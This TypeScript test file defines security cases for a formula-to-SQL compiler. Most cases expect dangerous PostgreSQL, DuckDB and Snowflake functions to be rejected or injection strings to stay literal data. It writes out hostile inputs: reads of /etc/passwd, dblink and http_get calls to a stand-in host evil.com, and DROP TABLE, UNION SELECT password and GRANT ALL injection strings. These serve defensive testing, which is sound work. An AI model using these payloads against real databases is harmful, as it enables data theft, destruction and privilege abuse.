import { ALL_WAREHOUSES } from '../config';
import type { TestCase } from '../types';

// Helper: 10 rows all returning the same string value (test_orders has 10 rows)
const tenRows = (value: any) =>
    Array.from({ length: 10 }, () => ({ result: value }));

export const securityCases: TestCase[] = [
    // ========================================================================
    // CATEGORY 1: Function allowlist enforcement
    // The formula compiler must REJECT any function not in the allowlist.
    // This is the primary security boundary — without it, users can call
    // arbitrary warehouse functions to bypass permissions, exfiltrate data,
    // cause DoS, or execute system commands.
    // ========================================================================

    // --- Generic dangerous functions ---
    {
        id: 'security/fn-unknown-rejected',
        formula: '=FAKEFUNC(A)',
        description: 'Unknown function names must be rejected at compile time',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist'],
    },

    // --- PostgreSQL-specific dangerous functions ---
    {
        id: 'security/fn-pg-sleep',
        formula: '=pg_sleep(1)',
        description: 'pg_sleep must be rejected — DoS via delay',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-pg-read-file',
        formula: '=pg_read_file("/etc/passwd")',
        description: 'pg_read_file must be rejected — filesystem access',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-pg-ls-dir',
        formula: '=pg_ls_dir("/tmp")',
        description: 'pg_ls_dir must be rejected — directory listing',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-dblink',
        formula: '=dblink("host=evil.com dbname=x", "SELECT 1")',
        description: 'dblink must be rejected — cross-database/network access',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-query-to-xml',
        formula: '=query_to_xml("SELECT 1", TRUE, TRUE, "")',
        description: 'query_to_xml must be rejected — arbitrary query execution',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-current-setting',
        formula: '=current_setting("server_version")',
        description: 'current_setting must be rejected — config disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-set-config',
        formula: '=set_config("log_statement", "all", FALSE)',
        description: 'set_config must be rejected — config mutation',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-lo-import',
        formula: '=lo_import("/etc/passwd")',
        description: 'lo_import must be rejected — large object file read',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },

    // --- DuckDB-specific dangerous functions ---
    {
        id: 'security/fn-duckdb-read-csv',
        formula: '=read_csv_auto("/etc/passwd")',
        description: 'read_csv_auto must be rejected — filesystem read in DuckDB',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-read-parquet',
        formula: '=read_parquet("data.parquet")',
        description: 'read_parquet must be rejected — filesystem read in DuckDB',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-read-json',
        formula: '=read_json_auto("config.json")',
        description: 'read_json_auto must be rejected — filesystem read in DuckDB',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-query',
        formula: '=query("SELECT secret FROM passwords")',
        description: 'query() must be rejected — arbitrary SQL in DuckDB',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-query-table',
        formula: '=query_table("secret_table")',
        description: 'query_table must be rejected — arbitrary table in DuckDB',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },

    // --- Snowflake-specific dangerous functions ---
    {
        id: 'security/fn-snowflake-system-typeof',
        formula: '=SYSTEM$TYPEOF(A)',
        description: 'SYSTEM$ functions must be rejected (Snowflake system functions)',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'snowflake'],
    },
    {
        id: 'security/fn-snowflake-get-ddl',
        formula: '=GET_DDL("TABLE", "secret_table")',
        description: 'GET_DDL must be rejected — schema disclosure in Snowflake',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'snowflake'],
    },

    // --- Information disclosure functions ---
    {
        id: 'security/fn-version',
        formula: '=version()',
        description: 'version() must be rejected — database version disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'info-disclosure'],
    },
    {
        id: 'security/fn-current-database',
        formula: '=current_database()',
        description: 'current_database must be rejected — info disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'info-disclosure'],
    },
    {
        id: 'security/fn-current-schema',
        formula: '=current_schema()',
        description: 'current_schema must be rejected — info disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'info-disclosure'],
    },
    {
        id: 'security/fn-current-user',
        formula: '=current_user()',
        description: 'current_user must be rejected — credential disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'info-disclosure'],
    },
    {
        id: 'security/fn-inet-server-addr',
        formula: '=inet_server_addr()',
        description: 'inet_server_addr must be rejected — network info disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'info-disclosure'],
    },

    // --- Case sensitivity bypass attempts ---
    {
        id: 'security/fn-case-bypass-lower',
        formula: '=pg_sleep(1)',
        description: 'Lowercase function names must also be rejected',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'case-bypass'],
    },
    {
        id: 'security/fn-case-bypass-mixed',
        formula: '=Pg_Sleep(1)',
        description: 'Mixed case function names must also be rejected',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'case-bypass'],
    },

    // ========================================================================
    // CATEGORY 2: SQL injection via string literals
    // Malicious SQL in string literals must be treated as DATA, not code.
    // These tests SUCCEED — the formula compiles and executes, returning the
    // payload as a harmless literal string value.
    // ========================================================================

    {
        id: 'security/sqli-drop-table',
        formula: `="'; DROP TABLE test_orders; --"`,
        description: 'DROP TABLE payload in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; DROP TABLE test_orders; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-union-select',
        formula: `="' UNION SELECT password FROM users --"`,
        description: 'UNION SELECT payload in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("' UNION SELECT password FROM users --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-semicolon-select',
        formula: `="'; SELECT * FROM information_schema.tables; --"`,
        description: 'Multi-statement payload in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; SELECT * FROM information_schema.tables; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-sleep',
        formula: `="'; SELECT pg_sleep(10); --"`,
        description: 'Sleep injection in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; SELECT pg_sleep(10); --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-boolean-tautology',
        formula: `="' OR '1'='1"`,
        description: 'Boolean tautology payload must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("' OR '1'='1"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-stacked-queries',
        formula: `="'; INSERT INTO test_orders(id) VALUES(999); --"`,
        description: 'Stacked query payload in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; INSERT INTO test_orders(id) VALUES(999); --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-create-table',
        formula: `="'; CREATE TABLE evil(data TEXT); --"`,
        description: 'DDL in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; CREATE TABLE evil(data TEXT); --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-update',
        formula: `="'; UPDATE test_orders SET order_amount=0; --"`,
        description: 'UPDATE payload in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; UPDATE test_orders SET order_amount=0; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-delete',
        formula: `="'; DELETE FROM test_orders; --"`,
        description: 'DELETE payload in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; DELETE FROM test_orders; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-grant',
        formula: `="'; GRANT ALL ON ALL TABLES TO evil_user; --"`,
        description: 'GRANT payload in string literal must be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; GRANT ALL ON ALL TABLES TO evil_user; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },

    // --- String injection via CONCAT (payload flows through function) ---
    {
        id: 'security/sqli-concat-injection',
        formula: `=CONCAT("x", "'; DROP TABLE test_orders; --")`,
        description: 'Injection payload concatenated must remain data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("x'; DROP TABLE test_orders; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },

    // --- Backslash escaping attempts ---
    {
        id: 'security/sqli-backslash-escape',
        formula: `="test\\'; DROP TABLE test_orders; --"`,
        description: 'Backslash before quote must not defeat escaping',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("test\\'; DROP TABLE test_orders; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },

    // --- Null byte injection ---
    {
        id: 'security/sqli-null-byte',
        formula: `="hello\\0world"`,
        description: 'Null byte escape sequence must be treated as literal characters',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows('hello\\0world'),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },

    // ========================================================================
    // CATEGORY 3: Grammar boundary enforcement
    // The Peggy grammar must reject SQL constructs that don't belong in
    // a formula expression. These must produce parse errors.
    // ========================================================================

    {
        id: 'security/grammar-semicolon',
        formula: '=A; DROP TABLE test_orders',
        description: 'Semicolons must not parse — prevents multi-statement injection',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-line-comment',
        formula: '=A --this is a comment',
        description: 'SQL line comments must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-block-comment',
        formula: '=A /* comment */ + 1',
        description: 'SQL block comments must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-union',
        formula: '=A UNION SELECT 1',
        description: 'UNION keyword must not parse in formula context',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-select',
        formula: '=SELECT 1',
        description: 'SELECT keyword must not parse as a formula',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-from',
        formula: '=A FROM test_orders',
        description: 'FROM keyword must not parse in formula context',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-where',
        formula: '=A WHERE 1=1',
        description: 'WHERE keyword must not parse in formula context',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-into',
        formula: '=A INTO OUTFILE "/tmp/evil"',
        description: 'INTO keyword must not parse — prevents file write',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-dollar-quoting',
        formula: '=$tag$malicious$tag$',
        description: 'Dollar-quoting (PostgreSQL) must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-exec',
        formula: '=EXEC("malicious")',
        description: 'EXEC must be rejected — generic command execution',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },
    {
        id: 'security/grammar-copy',
        formula: '=COPY("test_orders", "/tmp/out")',
        description: 'COPY function must be rejected — data export',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'grammar-boundary'],
    },

    // ========================================================================
    // CATEGORY 4: SET / session manipulation
    // Attackers may try to change session settings to weaken security
    // (e.g. disable standard_conforming_strings in PostgreSQL).
    // ========================================================================

    {
        id: 'security/grammar-set-statement',
        formula: '=SET standard_conforming_strings TO off',
        description: 'SET statements must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'session-manipulation'],
    },
    {
        id: 'security/fn-set-config',
        formula: '=set_config("standard_conforming_strings", "off", FALSE)',
        description: 'set_config function must be rejected — session manipulation via function',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'session-manipulation'],
    },

    // ========================================================================
    // CATEGORY 5: Extension loading
    // Loading extensions can enable dangerous capabilities (network access,
    // filesystem access, code execution).
    // ========================================================================

    {
        id: 'security/fn-duckdb-install',
        formula: '=install("httpfs")',
        description: 'DuckDB install() must be rejected — extension installation',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'extension-loading'],
    },
    {
        id: 'security/fn-duckdb-load',
        formula: '=load_extension("httpfs")',
        description: 'DuckDB load_extension() must be rejected',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'extension-loading'],
    },

    // ========================================================================
    // CATEGORY 6: Subquery injection
    // Subqueries in the SELECT expression could read other tables.
    // The grammar must not allow SELECT or subquery syntax.
    // ========================================================================

    // Note: (SELECT 1) would be parsed as parenthesized expression, then
    // SELECT would need to be a valid identifier/expression start. Since
    // "SELECT" followed by a space and "1" would parse SELECT as a ColumnRef
    // and then hit unexpected "1", this should fail. Let's verify:
    {
        id: 'security/grammar-subquery-parens',
        formula: '=(SELECT order_amount FROM test_orders LIMIT 1)',
        description: 'Parenthesized subquery must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'subquery'],
    },
    {
        id: 'security/grammar-exists-subquery',
        formula: '=EXISTS(SELECT 1)',
        description: 'EXISTS with subquery must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        // EXISTS parses as function call, but SELECT 1 inside is not valid
        // grammar for function arguments (SELECT is column ref, then 1 is unexpected)
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'subquery'],
    },

    // ========================================================================
    // CATEGORY 7: Type casting / CAST injection
    // CAST expressions could potentially be used to construct payloads.
    // ========================================================================

    {
        id: 'security/fn-cast',
        formula: '=CAST(A)',
        description: 'CAST must be rejected as an unknown function',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'type-casting'],
    },
    {
        id: 'security/grammar-double-colon-cast',
        formula: '=A::text',
        description: 'PostgreSQL :: cast syntax must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'type-casting'],
    },

    // ========================================================================
    // CATEGORY 8: Column reference safety
    // Even though column mappings are application-controlled, verify that
    // unknown column references fail gracefully at compile time.
    // ========================================================================

    {
        id: 'security/column-unknown-ref',
        formula: '=EVIL_COL',
        description: 'Reference to unmapped column must fail at compile time',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown column',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'column-safety'],
    },
    {
        id: 'security/column-no-wildcard',
        formula: '=CONCAT("*")',
        description: 'Asterisk in string must be treated as data, not SELECT *',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows('*'),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'column-safety'],
    },

    // ========================================================================
    // CATEGORY 9: Allowed functions still work (sanity checks)
    // Security hardening must not break legitimate formulas.
    // ========================================================================

    {
        id: 'security/allowed-fn-concat',
        formula: '=CONCAT(A, " safe")',
        description: 'CONCAT must still work after security hardening',
        columns: { A: 'customer_name' },
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: [
            { result: 'Alice safe' },
            { result: 'Bob safe' },
            { result: 'Charlie safe' },
            { result: 'Diana safe' },
            { result: 'Eve safe' },
            { result: 'Frank safe' },
            { result: 'Grace safe' },
            { result: 'Henry safe' },
            { result: 'Ivy safe' },
            { result: 'Jack safe' },
        ],
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sanity-check'],
    },
    {
        id: 'security/allowed-fn-if',
        formula: '=IF(A > 100, "high", "low")',
        description: 'IF must still work after security hardening',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: [
            { result: 'low' },
            { result: 'high' },
            { result: 'low' },
            { result: 'high' },
            { result: 'low' },
            { result: 'high' },
            { result: 'high' },
            { result: 'low' },
            { result: 'high' },
            { result: 'high' },
        ],
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sanity-check'],
    },
    {
        id: 'security/allowed-fn-coalesce',
        formula: '=COALESCE(A, 0)',
        description: 'COALESCE must still work after security hardening',
        columns: { A: 'val_a' },
        sourceTable: 'test_nulls',
        orderBy: 'id',
        expectedRows: [
            { result: 10.00 },
            { result: 0 },
            { result: 30.00 },
            { result: 0 },
            { result: 50.00 },
        ],
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sanity-check'],
    },
    {
        id: 'security/allowed-fn-abs',
        formula: '=ABS(-A)',
        description: 'ABS must still work after security hardening',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: [
            { result: 100.00 },
            { result: 250.50 },
            { result: 75.00 },
            { result: 500.00 },
            { result: 30.00 },
            { result: 180.00 },
            { result: 420.00 },
            { result: 60.00 },
            { result: 310.00 },
            { result: 150.00 },
        ],
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sanity-check'],
    },

    // ========================================================================
    // CATEGORY 10: Multiple quote types and escaping edge cases
    // ========================================================================

    {
        id: 'security/string-single-quote-in-double',
        formula: `=CONCAT("it's", " fine")`,
        description: 'Single quote inside double-quoted string must be properly escaped',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("it's fine"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'escaping'],
    },
    {
        id: 'security/string-many-quotes',
        formula: `="''''"`,
        description: 'Multiple consecutive single quotes in string must be properly escaped',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("''''"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'escaping'],
    },
    {
        id: 'security/string-alternating-quotes',
        formula: `="a'b'c'd"`,
        description: 'Alternating single quotes must all be escaped',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("a'b'c'd"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'escaping'],
    },

    // ========================================================================
    // CATEGORY 11: Nested function attacks
    // Using allowed functions to smuggle dangerous ones as arguments
    // ========================================================================

    {
        id: 'security/fn-nested-dangerous',
        formula: '=CONCAT(version(), "x")',
        description: 'Dangerous function nested inside allowed function must be rejected',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'nested-attack'],
    },
    {
        id: 'security/fn-nested-deep',
        formula: '=ABS(ROUND(pg_sleep(5)))',
        description: 'Dangerous function deeply nested must still be rejected',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'nested-attack'],
    },
    {
        id: 'security/fn-nested-in-if',
        formula: '=IF(TRUE, pg_sleep(5), 0)',
        description: 'Dangerous function in IF branch must be rejected',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'nested-attack'],
    },
    {
        id: 'security/fn-in-comparison',
        formula: '=IF(read_csv_auto("/etc/passwd") = "root", 1, 0)',
        description: 'Dangerous function in comparison must be rejected',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'nested-attack'],
    },

    // ========================================================================
    // CATEGORY 12: Special character injection in formulas
    // ========================================================================

    {
        id: 'security/grammar-backtick',
        formula: '=`order_amount`',
        description: 'Backtick-quoted identifiers must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'special-chars'],
    },
    {
        id: 'security/grammar-at-sign',
        formula: '=@variable',
        description: 'Session variables (@) must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'special-chars'],
    },
    {
        id: 'security/grammar-hash',
        formula: '=#temp_table',
        description: 'Temp table references (#) must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'special-chars'],
    },

    // ========================================================================
    // CATEGORY 13: COPY / EXPORT data exfiltration
    // ========================================================================

    {
        id: 'security/fn-pg-copy-to',
        formula: '=pg_catalog.pg_stat_file("/etc/passwd")',
        description: 'Qualified function names with dots must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'data-exfiltration'],
    },
    {
        id: 'security/fn-http-get',
        formula: '=http_get("https://evil.com/exfil")',
        description: 'HTTP functions must be rejected — network access',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'data-exfiltration'],
    },

    // ========================================================================
    // CATEGORY 14: SQL keyword operators in expression context
    // Attackers may use SQL keywords as operators to break out of the
    // expression context and inject clauses that change query semantics.
    // ========================================================================

    {
        id: 'security/grammar-like-operator',
        formula: '=A LIKE "%"',
        description: 'LIKE operator must not parse — could enable pattern matching attacks',
        columns: { A: 'customer_name' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-in-list',
        formula: '=A IN (1, 2, 3)',
        description: 'IN keyword must not parse — prevents set membership injection',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-in-subquery',
        formula: '=A IN (SELECT 1)',
        description: 'IN with subquery must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-between',
        formula: '=A BETWEEN 1 AND 100',
        description: 'BETWEEN keyword must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-having',
        formula: '=A HAVING A > 100',
        description: 'HAVING keyword must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-order-by',
